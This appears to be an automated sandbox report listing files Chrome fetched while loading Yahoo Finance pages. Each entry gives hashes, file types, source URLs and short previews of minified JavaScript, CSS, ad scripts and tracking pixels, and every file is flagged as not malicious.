                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3EE63CE538153EDF85A4C36E004EEB2ED01FC77962BE45DFE3C4C91543B8D0F528C37841EA7939B98D596EEBC5C4EF91C0C03108E7C79491271836B5B871057C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/logUtil.hOue7iAU.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{r as v}from"./commonUtil.CI22_Irn.js";import"./43.CtYdpA_T.js";const T=({label:e,request:r=null,response:t=null,context:s,time:o})=>{typeof window<"u"||(s.parent&&typeof s.request>"u"?s.parent().then(({stores:n,session:a})=>{const{isDebug:i=!1}=a;i&&(console.log(JSON.stringify({duration:o[1]-o[0],label:e,request:r,response:t,time:o})),n.debug.addPerf({label:e,request:r,response:t,time:o}))}):(s.locals||(s.locals={}),s.locals.perf||(s.locals.perf=[]),s.locals.perf.push({label:e,request:r,response:t,time:o})))};function q(e,r){console.error("Logger Error:",e,r)}function P(e,r){if(e.name==="AbortError"){const t=new Error("Request timed out",{cause:e});throw q({message:"Request timed out",status:408},r),t}throw q(e,r),e}function U(e,{includeResponse:r=!1}={}){if(!e.ok){const t=new Error(e.statusText);throw t.status=e.status,t}return e.text().then(t=>{let s=t;try{s=JSON.parse(t)}catch{}return r?[s,e]:s})}function $(e){return(r,t)=>{const s=typeof e=="function"?e:fetch,o=(t==null?void
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (5574)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):5575
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.475774946740973
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:8TTNFPszF1mTtgkQAWAbZNNmt/BemAggtfWF6/zLWAyJNmt/BcemODRVztfR5bQn:YF0z7mT2kQAWYZNNmRBemAggUQHnyJN5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:F151C018CD234592E2CC6934E7DC193B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:1DE96619E98A217753593B67287E84DF3BF891F7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:586DACB28A103971BF9CE3CB5C37F5F127667FEDC711A5524C2AE74B77B03AC4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6619B6DDD0A2FF649795E90955AF4154B7894A6BEDBADA05A00D6CB3A9EF4DA8131925C9038F6957833B144818F3A69115A28E173729E473AD662B218DA4EBEB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/FeatureBarNeo.DkDKoe4s.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as Y,p as H,k as R,i as v,y as Z,e as k,d as w,f as E,q as c,_ as F,U as L,t as C,b as V,h as N,j as D,l as p,m as y,n as z}from"./scheduler.Dr9AAxFe.js";import{S as $,i as x,t as B,g as j,a as I,e as G,c as J,b as K,m as O,d as Q}from"./index.DCSmZEjO.js";import{A as ee}from"./arrow_forward.8N8VOjY3.js";import{I as ae}from"./Icon.BSWt_jx8.js";import{L as le}from"./Link.Cll6KZpb.js";import{g as re}from"./commonUtil.CI22_Irn.js";function P(t){let e,l,a,f,r;const u=[ie,te],n=[];function b(i,s){return i[4]?0:1}return l=b(t),a=n[l]=u[l](t),{c(){e=k("div"),a.c(),this.h()},l(i){e=w(i,"DIV",{class:!0,role:!0});var s=E(e);a.l(s),s.forEach(v),this.h()},h(){c(e,"class",f=F(`fb-wrapper ${t[0]}`)+" yf-1a92qi"),c(e,"role","alert"),L(e,"paddingBottom",t[1]),L(e,"dynamicInsights",!!t[2])},m(i,s){R(i,e,s),n[l].m(e,null),r=!0},p(i,s){let m=l;l=b(i),l===m?n[l].p(i,s):(j(),I(n[m],1,1,()=>{n[m]=null}),G(),a=n[l],a?a.p(i,s):(a=n[l]=u[l](i),a.c()),B(a,1),a.m(e,null)),(!r||s&1&&f!==(f=F(`fb-wrapper
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):674
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.5533062694914435
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:6v/7lTWdr2y4EpIRBbYVmD9jH6jkhplhXe4QKoFS6cTWtuM6Ae8S3uk5+:8ukEaRBbd92GLhyKwcH8Kj8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:25A8A1E3479B793E8BCDDC8B2BA726A9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:248492192BB393C84661DAAB721FCC5D0B82D165
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2D5A29E2C8A731B9C0891DFA54C3BF753AD5BBA2911E71EBCA654C273CF08748
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:758BAE768D116E95D923A254204AE52624A0BF3A4578FE62BC9039659C45655240B77E9BB92433669CC90F6DE32C4DF4E5BD83FC632F7C71A85A285446272159
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@......iq....iIDATx^.=n.0..9.G..8.G..8B..."%.. &6z.$$6&.P.6.V.V_U..u.....?.....v...z.L&....N...;../..Qo`.x.b..T.!P.:....3p.t.b).L&_....5.`....u....iQ.aij.j,-.ah0.Rmp.....J.......C..Y........3e<!.X.W+....k......l;..9....8...@.......(.@.0..uI.TU,.Z...Y.....E.......B.o._..........'}.i..m..4.T...OR.?O'....n.>.T0Z..kM.4..o^`..\....h..V......t...U.x.#L.... ...c.^w->J.5....P.m...V{..=Eu\...T.= .$..lh.....w,...&....su..x.....&."..Y.o.z.a]5h...R.x..&..s..5...\...p..nh..x......^.`.zo.w,.I.k.....zk.C.$.zi.C.d...J.M..0.0.PF.&.W.O\.@N.../..vk.`.L.L..$."LM.,F....Ra*'.9..6T....../.4.i..`..K.E.T..>..d2q..2%Vh.C.p....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (41355)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42428
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.703075066611382
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:jB+BCJMaSYT4h1YbunWn26NOGJ8MY9nyg2HaeYJGsAhy1:jBhMekASnKOGJYjnJfWy1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A7AE899EDDC2166C2357FC512180C6B4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F650730B2A757B4E4A2E35F813DF5E5864690171
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:FC00292225A8FAAA3281B253B5EF630EA0225825920D3AD5278C885F5847B716
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:4257FDC0EC504EDFB9011577E431031ADDE2E93642B628F0DB55EF162C7621C7AC24F084DBA3CCAD9F3570698431FDEC1D674B5D3BCC221952D86C4EE2F37942
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview://# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjogMywic291cmNlcyI6WyIiXSwic291cmNlc0NvbnRlbnQiOlsiICJdLCJuYW1lcyI6WyJjbG9zdXJlRHluYW1pY0J1dHRvbiJdLCJtYXBwaW5ncyI6IkFBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEifQ==. (function(){function Y(k){return k}var V=function(k){return Y.call(this,k)},r=function(k,L,W,v,E){if(v=W,E=l.trustedTypes,!E||!E.createPolicy)return v;try{v=E.createPolicy(L,{createHTML:V,createScript:V,createScriptURL:V})}catch(C){if(l.console)l.console[k](C.message)}return v},l=this||self;(0,eval)(function(k,L){return(L=r("error","bg",null))&&k.eval(L.createScript("1"))===1?function(W){return L.createScript(W)}:function(W){return""+W}}(l)(Array(Math.random()*7824|0).join("\n")+['//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjogMywic291cmNlcyI6WyIiXSwic291cmNlc0NvbnRlbnQiOlsiICJdLCJuYW1lcyI6WyJjbG9zdXJlRHluYW1pY0J1dHRvbiJdLCJtYXBwaW5ncyI6IkFBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEifQ==',.'(function(){/*',.''
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):99
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.635704954376218
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:YTyLSVnuTU4QcHkK0LuSSbQQOGLT4:YWLSV3d2R3bQQbn4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C8661E043E66C2DF0C7411008CB66BE0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:CED683D10519138CBE58CD6A12A7892EA3F6550C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:6D5C16CA931DB29269289DE7DFA5C68EBDAA6FC36F2BCA60B8DAED570EC827A0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:09AE98DA08C432909F0646C0DE45D717CA46BFD8D748699ACB1B38D2495D1CE967C5F47BAA3CFFAAD71E6BB175C13247B4A7EB68B62C71BFE0650D57D7E1062B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://id.a-mx.com/sync?tao=1&&uid=68d32af8-495d-4c33-841d-b59b90ac7b1d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{"version":"v3","id":"amx*3*68d32af8-495d-4c33-841d-b59b90ac7b1d*08b17ccc28422c2538145878e50aa866"}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://widget.us.criteo.com/dis/usersync.aspx?r=44&p=75&cp=triplelift&cu=1&gdpr=0&gdpr_consent=&us_privacy=&gpp=&gpp_sid=&url=https%3A%2F%2Feb2.3lift.com%2Fxuid%3Fmid%3D2711%26xuid%3D%40%40CRITEO_USERID%40%40%26dongle%3D013b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):235662
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.879849036009606
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:gtw6S88yG8ycqmPbp0pMkpM7LFIYYdvvbLqlodOkfSfT++H3o1Ji4:N6S88y/BlockfJ3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:87D9F989FBD1FE1F2D06130DF2DDD991
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:49C25F5DA5A6FBF36D6AB0F10D163E777234FD65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:FB7265BCE07F553CC1ABE0295A4608A4CAD6C1E4736FB3102174DC7570BC8BAB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5B135230069771F17E11EF7642EAC5AEAB50E9C97855564499DC2E0BB6BAF5FC39395559EEE12E000E0806228C07A45EA414D1BFAF06BE9134844FF7FACD8750
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/c/49c25f5.caas-news_web.min.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:@keyframes slideUp{0%{transform:translateY(200%)}to{transform:translateY(0)}}@keyframes adhide{0%{visibility:visible}to{visibility:hidden}}@keyframes show-success-message{0%{opacity:0;transform:translateY(10px)}80%{opacity:1;transform:translateY(0)}to{opacity:0;transform:translateY(-10px)}}@keyframes immersive-share-appear-in{0%{opacity:0}to{opacity:1}}@keyframes fade{0%{opacity:1}to{opacity:0}}@keyframes shine{0%,to{opacity:1}50%{opacity:.5}}@keyframes wave{0%,60%,to{transform:initial}30%{transform:translateY(-4px)}}@keyframes inlineXrayTooltipFadeIn{0%{opacity:0}to{opacity:1}}@keyframes liveBadgePulse{0%{transform:scale(.43,.43);opacity:1}to{transform:scale(1,1);opacity:0}}@keyframes ellipsesAnimation{0%,30.43%{content:"."}34.78%,65.21%{content:".."}69.56%,to{content:"..."}}@keyframes loader-animate{0%{transform:translate3d(-100%,0,0)}to{transform:translate3d(100%,0,0)}}@font-face{font-family:"YahooSerifDisplay";src:local("Yahoo Serif Display"),url(https://s.yimg.com/cv/apiv2/default
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (16798), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):16798
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.223409253489215
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:3+Ec6BG/PFvVHWahu22YXGjDmgTkgcpUh1HswyjIkr8EAe:OD+ipVHWa1c/TIUYjINe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:F085D6C42ACB1394E457E463230DE8BA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:DEACA09E50FB2D08C90F07CC588A8B1B4C191732
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F2C2013A67C8DD205E93EF40CF60DA7B3BB48A075E7B649FDE2B2F646B15896F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:029FDDCBD993E68E25B470D316CC94EF513AC536AB70C39F5B6920B6BEF6398F3BF77DD5F6067441337068566F1DCF408CDEC28DC22E03256E634AF644322875
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-fetch",[],t):"object"==typeof exports?exports["wafer-fetch"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-fetch"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(r[n])return r[n].exports;var i=r[n]={i:n,l:!1,exports:{}};return e[n].call(i.exports,i,i.exports,t),i.l=!0,i.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,n){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function n(e,t){var r={};for(var n in e)t.indexOf(n)>=0||Object.prototype.hasOwnProperty.call(e,n)&&(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://pbs.yahoo.com/setuid?bidder=adobe&gdpr=0&gdpr_consent=&gpp=&gpp_sid=&f=i&uid=ZwWElQAHy2g0HAA9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (62403)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):77851
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.422328020643102
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:sVeGNcrk8ZlWwWJfg8f4NX6ziaubyLszIg:sVei8Zle7f4NqzxubyLszIg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:60F19CA2F094ACABBA5B7988467387C4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C7EA2FA0D8DA961083A322D72DEE176A45DF9232
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:FD9784852FBB3FE6285225683513C82D88F104AF9B05AE0B7C5E973F33A0BBA1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:FD06B5BA1C97017C7833C7011202DC51821705ED85ACBE03F5AC3E4B01AA39F2D1F3F3CDF4EDBF50D48A5788FEB61DF0782181948F44F44614EC2A23327CE0CF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/*! SAFEFRAME 0.1.434 . 2024, Yahoo Inc. All rights reserved. */!function(){var t={9466:function(t){var e;(e=void 0===e?{}:e).close={name:"close",height:48,width:48,path:"M37.98 34.827l-9.9-9.9 9.9-9.898c.78-.782.78-2.05 0-2.83-.78-.78-2.047-.78-2.828 0l-9.9 9.9-9.898-9.9c-.78-.78-2.048-.78-2.828 0-.78.78-.78 2.047 0 2.828l9.9 9.9-9.9 9.898c-.78.78-.78 2.047 0 2.828.78.78 2.047.78 2.828 0l9.9-9.9 9.898 9.9c.78.78 2.048.78 2.828 0 .782-.78.782-2.047 0-2.827z"},t.exports&&(t.exports=e.close)},4228:function(t){var e;(e=void 0===e?{}:e)["decline-fill"]={name:"decline-fill",height:48,width:48,path:"M24 1C11.3 1 1 11.3 1 24s10.3 23 23 23 23-10.3 23-23S36.7 1 24 1zm9.8 32.8c-.9.9-2.2.9-3.1 0L24 27l-6.8 6.8c-.9.9-2.2.9-3.1 0s-.9-2.2 0-3.1l6.8-6.8-6.7-6.7c-.9-.9-.9-2.2 0-3.1.9-.9 2.2-.9 3.1 0l6.7 6.7 6.7-6.7c.9-.9 2.2-.9 3.1 0 .9.9.9 2.2 0 3.1l-6.7 6.7 6.7 6.8c.9.9.9 2.3 0 3.1z"},t.exports&&(t.exports=e["decline-fill"])},8586:function(t,e,n){"use strict";var r,o=n(7427),i=n(3215),s=n(3945);fun
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):88441
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.376304260953804
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:0OVy3/5/Ix02uDPGofcr++RgpOifEvj8h45Rfw+6bo5PA8c:aR402YGoEbBvQh45R56bo5PAT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:0BD8448FC842F815DDBEAE6033D1EF7B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B2D0AAC0C95B06E0001A44DC7C182C6ED64CF074
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:557AB61E9C27BECC3F53A932B6CF366C752029F7BD9A7B107B60B1E89A2A2449
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:026D3901376B5190B7CBA86A133ECE15B232B43FBA76377E731A5AA787662FC72F763958F63599E73327EDFACCB1CE3AA0E3DC9F42F945A24A98628C569ACBEB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/benji/benji-2.1.131.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(){"use strict";const e="undefined"!=typeof window?window:{assertive:{},benji:{},googletag:{cmd:[]},pbjs:{que:[]},YAHOO:{}};Promise.allSettled=Promise.allSettled||(e=>Promise.all(e.map((e=>e.then((e=>({status:"fulfilled",value:e}))).catch((e=>({reason:e,status:"rejected"})))))));const t=["localhost","aol.com","aol.co.uk","aol.de","autoblog.com","cricket.yahoo.sportz.io","engadget.com","yahoo.com","yahoo.com.hk","yahoo.com.tw"].map((e=>`([\\.\\w\\-]+\\.)?${e.replace(/\./g,"\\.")}`)),n=["cricket.yahoo.net"].map((e=>e.replace(/\./g,"\\."))),i=new RegExp(`^https?://(${t.concat(n).join("|")})(:\\d+)?$`);const s="initialize",o="initialize_ack",r="initialize_i13n",a="intersect",c="render",d="resize_ad",l="start_ads",h="tab_focus",u="block",g="index",p=!0,f="DOMContentLoaded",m="0",b="testid",y="ncid",_="fr",E="pg_name",v="type",I="benji-premium-ad",S="auto",A="VERSION",C={ATS_DIRECT:"_lr_atsDirect"};var T,w;!function(e){e.DynamicAllocation="Dynamic Allocation",e.DirectSold="Direct So
